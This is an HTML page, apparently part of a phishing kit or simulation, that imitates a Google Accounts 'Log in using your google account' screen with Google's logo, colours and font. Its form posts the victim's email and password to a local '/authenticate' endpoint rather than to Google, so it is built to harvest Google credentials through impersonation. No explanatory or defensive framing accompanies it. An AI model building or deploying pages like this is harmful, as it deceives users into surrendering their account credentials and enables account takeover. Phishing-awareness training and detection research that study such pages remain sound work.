<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="/static/images/google_icon.ico">


    
    <title>Login using Google Accounts</title>
    <style>

@font-face {
    font-family: 'ProductSansRegular';
    src: url('/static/fonts/product-sans/Product\ Sans\ Regular.ttf') format('truetype'); 
  }

 body, html { 
    text-align: center; 
    font-family: Arial, sans-serif;   
    background-color: #f0f4f9;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;

    width: 100%;
    height: 100%;

 }

.Glogin-container {
    background-color: #fff;
    height: 45%;
    width: 55%;

    min-width: fit-content;
    min-height: 55vh;

    display: flex;
    flex-direction: row;

}

.Gleft-container {
    height: 100%;
    width: 50%;
  
}

.Gright-container {
    height: 100%;
    width: 50%;
   
}

.under-Glogin-container {
    display: flex;
    flex-direction: row;
    width: 55%;
    padding-top: 1vh;
}

.under-Glogin-languageTXT {
    display: flex;
    align-content: center;   
    justify-content: left;

    padding-left: 2vh;

    width: 50%;
}

.under-Glogin-otherShit {
    display: flex;
    align-content: center;    
    justify-content: right;

    padding-right: 2vh;

    width: 50%;    
}

.Glogo-container {
    display: flex;
    width: 80%;
    height: 10%;
    padding-left: 7%;
    padding-top: 7%;

}

.Glogo-img {
    size: 50%;
}

.Glogin-text-container {
    display: flex;
    width: 80%;
    height: 10%;

    padding-left: 7%;
    padding-top: 2%;

    font-family: 'ProductSansRegular', sans-serif;    
    font-size: large;   
   
}

.GusingGaccount-text-container {
    display: flex;
    width: 80%;

    padding-left: 7%;
    padding-top: 4%;

    font-family: 'ProductSansRegular', sans-serif; 
    font-size: medium;   
}

h6 {
    margin-left: 1vh;
}



.login-btns {
    display: flex;
    flex-direction: row;
    align-content: center;
    justify-content: right;

    margin-top: 6vh;
    margin-right: 2.5vh;
 }

.login-button {
    background-color: 	#0b57d0;
    border-radius: 3vh;
    border-width: 0px;

    width: 10vh;
    min-width: fit-content;
    height: 5vh;

    color: #fff;
    font-family: 'ProductSansRegular', sans-serif;    
    font-size: large;
}

input {
    width: 45vh;
    height: 5vh;

    border-radius: 0.5vh;
    border-style: solid;
    border-width: 0.1vh;
    border-color: grey;

    margin-bottom: 1vh;
    margin-top: 1vh;

    font-family: 'ProductSansRegular', sans-serif;    
    font-size: medium;
}

.login-container{
    margin-top: 100px;
    margin-right: 1.5vh;    
}


    </style>
</head>
<body>
   <!-- 
    <form action="/authenticate" method="POST">
        <input type="email" name="email" placeholder="Email" required><br>
        <input type="password" name="password" placeholder="Password" required><br>
        <button type="submit">Log In</button>
    </form>
    -->


    <div class="Glogin-container">
        <div class="Gleft-container">
            <div class="Glogo-container">
                <img src="/static/images/glogo.png" class="Glogo-img">
            </div>
            <div class="Glogin-text-container">
                <h1>Log in</h1>
            </div>
            <div class="GusingGaccount-text-container">
                <h3>Using your google account</h3>
            </div>
        </div>

        <div class="Gright-container">
            <div class="login-container">
                <form action="/authenticate" method="POST">
                    <input type="email" name="email" placeholder="E-mail address or phone" style="padding-left: 15px;" required><br>
                    <div style="color: #0b57d0 ; font-weight: normal; text-align: left; margin-left: 4vw;" >Forgot your address?</div>
                    <input type="password" name="password" placeholder="Password" style="padding-left: 15px;" required><br>
                    <div style="color: #0b57d0 ; font-weight: normal; text-align: left; margin-left: 4vw;">Forgot the password?</div>
                   
                    <div class="login-btns">                        
                        <button class="login-button" type="submit">Log In</button>
                    </div>
                </form>
            </div>            
           
          
        </div>
    </div>
    <div class="under-Glogin-container">
        <div class="under-Glogin-languageTXT">
            <h6>English</h6>
        </div>
        <div class="under-Glogin-otherShit">
            <h6>Help</h6>
            <h6>Privacy</h6>  
            <h6>Terms</h6>
        </div>
    </div>

</body>
</html>
